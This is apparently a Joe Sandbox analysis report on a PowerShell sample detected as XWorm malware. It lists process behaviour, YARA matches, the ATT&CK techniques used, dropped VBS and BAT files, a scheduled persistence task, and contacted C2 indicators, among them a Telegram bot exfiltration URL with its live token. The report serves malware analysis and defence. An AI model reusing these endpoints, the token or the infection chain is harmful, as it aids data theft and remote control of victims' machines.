          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected XWorm
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.3865121018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3868513529.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1112, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected XWorm
          Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.3865121018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3868513529.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1112, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information112
          Scripting          		Valid Accounts11
          Windows Management Instrumentation          		112
          Scripting          		211
          Process Injection          		1
          Disable or Modify Tools          		OS Credential Dumping111
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		121
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell          		Logon Script (Windows)Logon Script (Windows)211
          Process Injection          		Security Account Manager121
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Obfuscated Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture1
          Ingress Tool Transfer          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets1
          System Network Configuration Discovery          		SSHKeylogging3
          Non-Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input Capture114
          Application Layer Protocol          		Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517142 Sample: LUYYSwStKN.ps1 Startdate: 24/09/2024 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 vecotr.viewdns.net 2->42 44 api.ipify.org 2->44 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 66 8 other signatures 2->66 10 wscript.exe 1 2->10         started        13 powershell.exe 14 48 2->13         started        signatures3 64 Uses the Telegram API (likely for C&C communication) 40->64 process4 dnsIp5 72 Wscript starts Powershell (via cmd or directly) 10->72 74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->74 76 Suspicious execution chain found 10->76 17 cmd.exe 1 10->17         started        46 api.telegram.org 149.154.167.220, 443, 49706 TELEGRAMRU United Kingdom 13->46 48 api.ipify.org 104.26.12.205, 443, 49705 CLOUDFLARENETUS United States 13->48 34 C:\ProgramData\Music\Visuals\VsLabsData.ps1, ASCII 13->34 dropped 36 C:\ProgramData\Music\Visuals\VsLabs.vbs, ASCII 13->36 dropped 38 C:\ProgramData\Music\Visuals\VsEnhance.bat, DOS 13->38 dropped 78 Loading BitLocker PowerShell Module 13->78 20 conhost.exe 13->20         started        file6 signatures7 process8 signatures9 52 Suspicious powershell command line found 17->52 54 Wscript starts Powershell (via cmd or directly) 17->54 56 Bypasses PowerShell execution policy 17->56 22 cmd.exe 1 17->22         started        25 conhost.exe 17->25         started        process10 signatures11 68 Suspicious powershell command line found 22->68 70 Wscript starts Powershell (via cmd or directly) 22->70 27 powershell.exe 15 22->27         started        process12 signatures13 80 Writes to foreign memory regions 27->80 82 Injects a PE file into a foreign processes 27->82 30 RegSvcs.exe 2 27->30         started        process14 dnsIp15 50 vecotr.viewdns.net 191.96.207.180, 49709, 50000 ASN-XTUDIONETES Chile 30->50 84 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->84 signatures16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          LUYYSwStKN.ps118%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://api.ipify.org0%URL Reputationsafe
          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://api.telegram.org/bot0%Avira URL Cloudsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
          https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessagep0%Avira URL Cloudsafe
          https://api.ipify.org?format=text0%Avira URL Cloudsafe
          https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
          https://api.telegram.org0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          http://www.microsoft.co0%Avira URL Cloudsafe
          https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage0%Avira URL Cloudsafe
          https://aka.ms/winsvr-2022-pshelpX0%Avira URL Cloudsafe
          http://api.ipify.org0%Avira URL Cloudsafe
          vecotr.viewdns.net0%Avira URL Cloudsafe
          https://api.ipify.org/?format=text0%Avira URL Cloudsafe
          https://api.telegram.org/bot$BotToken/sendMessage0%Avira URL Cloudsafe
          http://api.telegram.org0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          api.ipify.org
          		104.26.12.205
          		truefalse
            		unknown
            vecotr.viewdns.net
            		191.96.207.180
            		truetrue
              		unknown
              api.telegram.org
              		149.154.167.220
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessagefalse
                • Avira URL Cloud: safe
                		unknown
                https://api.ipify.org/?format=textfalse
                • Avira URL Cloud: safe
                		unknown
                vecotr.viewdns.nettrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.ipify.org?format=textpowershell.exe, 00000001.00000002.1567596454.0000026A4C862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613322253.0000026A5B7F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmp, LUYYSwStKN.ps1false
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1613322253.0000026A5B7F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://api.telegram.orgpowershell.exe, 00000001.00000002.1567596454.0000026A4C98C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://api.telegram.org/botpowershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessageppowershell.exe, 00000001.00000002.1567596454.0000026A4C98C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://go.micropowershell.exe, 00000001.00000002.1567596454.0000026A4D778000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.microsoft.copowershell.exe, 00000001.00000002.1625284459.0000026A63A20000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000001.00000002.1567596454.0000026A4D424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1567596454.0000026A4D3FE000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://api.ipify.orgpowershell.exe, 00000001.00000002.1567596454.0000026A4C94A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://api.ipify.orgpowershell.exe, 00000001.00000002.1567596454.0000026A4C862000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://api.telegram.org/bot$BotToken/sendMessagepowershell.exe, 00000001.00000002.1613322253.0000026A5B7F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmp, LUYYSwStKN.ps1false
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1613322253.0000026A5B7F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1567596454.0000026A4B781000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://api.telegram.orgpowershell.exe, 00000001.00000002.1567596454.0000026A4CA23000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1567596454.0000026A4B781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3868513529.0000000002771000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                149.154.167.220
                		api.telegram.orgUnited Kingdom
                		62041TELEGRAMRUtrue
                104.26.12.205
                		api.ipify.orgUnited States
                		13335CLOUDFLARENETUSfalse
                191.96.207.180
                		vecotr.viewdns.netChile
                		60458ASN-XTUDIONETEStrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1517142
                Start date and time:2024-09-24 19:23:37 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 22s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:LUYYSwStKN.ps1
                renamed because original name is a hash value
                Original Sample Name:046ef795e6a9e68203ad07963b6a828d5aff2f55ec57bb8c0ebd778ae594d1c4.ps1
                Detection:MAL
                Classification:mal100.troj.expl.evad.winPS1@13/12@3/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 94%
                • Number of executed functions: 15
                • Number of non-executed functions: 5
                Cookbook Comments:
                • Found application associated with file extension: .ps1
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: LUYYSwStKN.ps1

                Simulations

                Behavior and APIs

                TimeTypeDescription
                13:24:34API Interceptor84x Sleep call for process: powershell.exe modified
                13:24:59API Interceptor7269484x Sleep call for process: RegSvcs.exe modified
                19:24:43Task SchedulerRun new task: MicroSoftVisualsUpdater path: C:\ProgramData\Music\Visuals\VsLabs.vbs

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                149.154.167.220cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                  670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                    XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                      payload_1.vbsGet hashmaliciousXWormBrowse
                        4zyQ690hFT.ps1Get hashmaliciousXWormBrowse
                          NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                            ksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                              Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                  jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                    104.26.12.205file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • api.ipify.org/
                                    191.96.207.18084Z63SyEQ7.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                      XClient.exeGet hashmaliciousXWormBrowse
                                        GvJxEfWyS1.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                          7lFbTUxX9m.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                            XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                              lzsVg6vGuu.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                payload_1.vbsGet hashmaliciousXWormBrowse
                                                  Commitment_for_Title_Insurance-660184790411.wsfGet hashmaliciousXWormBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    vecotr.viewdns.net84Z63SyEQ7.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 191.96.207.180
                                                    XClient.exeGet hashmaliciousXWormBrowse
                                                    • 191.96.207.180
                                                    GvJxEfWyS1.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 191.96.207.180
                                                    7lFbTUxX9m.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 191.96.207.180
                                                    XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                                    • 191.96.207.180
                                                    lzsVg6vGuu.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 191.96.207.180
                                                    payload_1.vbsGet hashmaliciousXWormBrowse
                                                    • 191.96.207.180
                                                    Commitment_for_Title_Insurance-660184790411.wsfGet hashmaliciousXWormBrowse
                                                    • 191.96.207.180
                                                    api.ipify.orgcFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                    • 172.67.74.152
                                                    670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                                    • 104.26.12.205
                                                    XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                                    • 104.26.13.205
                                                    payload_1.vbsGet hashmaliciousXWormBrowse
                                                    • 104.26.12.205
                                                    4zyQ690hFT.ps1Get hashmaliciousXWormBrowse
                                                    • 172.67.74.152
                                                    NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                                                    • 104.26.12.205
                                                    ksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                                                    • 172.67.74.152
                                                    Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                                    • 104.26.13.205
                                                    eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                                    • 104.26.13.205
                                                    jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                                    • 104.26.12.205
                                                    api.telegram.orgcFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    payload_1.vbsGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    4zyQ690hFT.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    ksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    TELEGRAMRUcFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    payload_1.vbsGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    4zyQ690hFT.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    ksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    CLOUDFLARENETUScFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                                    • 172.67.74.152
                                                    670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                                                    • 104.26.12.205
                                                    XeI2N4WyGz.ps1Get hashmaliciousXWormBrowse
                                                    • 104.26.13.205
                                                    PurchaseXOrderXPO16145.xlsGet hashmaliciousUnknownBrowse
